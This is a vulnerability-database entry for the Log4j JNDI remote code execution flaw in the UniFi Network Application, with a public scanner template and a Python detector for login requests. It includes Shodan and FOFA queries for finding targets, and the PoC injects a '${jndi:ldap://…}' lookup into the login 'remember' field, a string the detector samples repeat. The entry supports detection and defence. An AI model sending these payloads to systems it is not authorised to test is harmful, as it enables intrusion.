unifi-network-log4j-rce: UniFi Network Log4j JNDI RCE

Date: 2025-09-01 | Affected software: Unifi Network | PoC: Public

Vulnerability description

A critical vulnerability in Apache Log4j, identified as CVE-2021-44228, has been publicly disclosed that may allow remote code execution in an impacted UniFi Network Application.

shodan-query: http.title:"UniFi Network"
fofa: UniFi network

PoC code [public]

id: unifi-network-log4j-rce

info:
  name: UniFi Network Log4j JNDI RCE
  author: KrE80r, NLEG
  severity: critical
  verified: true
  description: |
    A critical vulnerability in Apache Log4j identified by CVE-2021-44228 has been publicly disclosed that may allow for remote code execution in an impacted UniFi Network Application .
    shodan-query: http.title:"UniFi Network"
    fofa: UniFi network
  reference:
    - https://community.ui.com/releases/UniFi-Network-Application-6-5-55/48c64137-4a4a-41f7-b7e4-3bee505ae16e
    - https://twitter.com/sprocket_ed/status/1473301038832701441
  tags: cve,cve2021,rce,log4j,ubnt,unifi,oast,jndi,kev
  created: 2023/06/10

set:
  rooturl: request.url
  oob: oob()
  oobDNS: oob.DNS
rules:
  r0:
    request:
      method: POST
      path: /api/login
      headers:
        Content-Type: application/json; charset=utf-8
        Origin: "{{rooturl}}"
        Referer: "{{rooturl}}/manage/account/login?redirect=%2Fmanage"
      body: |
        {"username":"user","password":"pass","remember":"${jndi:ldap://{{oobDNS}}}","strict":true}
    expression: oobCheck(oob, oob.ProtocolDNS, 3)
expression: r0()
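
A defensive counterpart to the template above, added here as an example (it is not part of the original template or of UniFi's code): it inspects captured `/api/login` request bodies for Log4j JNDI lookup strings in any JSON field. The sample bodies are constructed, the function names are hypothetical, and the check that `remember` is normally a JSON boolean is an assumption.

```python
import json
import re

# Log4j JNDI lookup opener, e.g. "${jndi:", matched case-insensitively.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Constructed sample request bodies (not captured traffic).
SAMPLES = [
    '{"username":"admin","password":"hunter2","remember":false,"strict":true}',
    '{"username":"user","password":"pass",'
    '"remember":"${jndi:ldap://collector.example.invalid}","strict":true}',
    '{"username":"${JNDI:ldap://collector.example.invalid}","password":"x","remember":true}',
]


def walk_strings(value, path=""):
    """Yield (json_path, text) for every string value in a decoded JSON document."""
    if isinstance(value, str):
        yield path, value
    elif isinstance(value, dict):
        for key, item in value.items():
            yield from walk_strings(item, f"{path}.{key}")
    elif isinstance(value, list):
        for index, item in enumerate(value):
            yield from walk_strings(item, f"{path}[{index}]")


def inspect_login_body(raw_body: str) -> list:
    """Return findings for one POST /api/login body; an empty list means clean."""
    try:
        doc = json.loads(raw_body)
    except ValueError:
        # Body is not valid JSON: fall back to scanning the raw text.
        return ["jndi-lookup:<raw body>"] if JNDI_LOOKUP.search(raw_body) else []
    findings = [f"jndi-lookup:{path}"
                for path, text in walk_strings(doc) if JNDI_LOOKUP.search(text)]
    # Assumption: a legitimate client sends "remember" as a JSON boolean,
    # so any other type in that field is worth flagging on its own.
    if isinstance(doc, dict) and "remember" in doc \
            and not isinstance(doc["remember"], bool):
        findings.append("type-anomaly:.remember")
    return findings


if __name__ == "__main__":
    for body in SAMPLES:
        print(inspect_login_body(body) or "clean", "<-", body)
```

The literal match covers the plain form of the lookup used in the template; the type check on `remember` does not depend on how the string is written.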
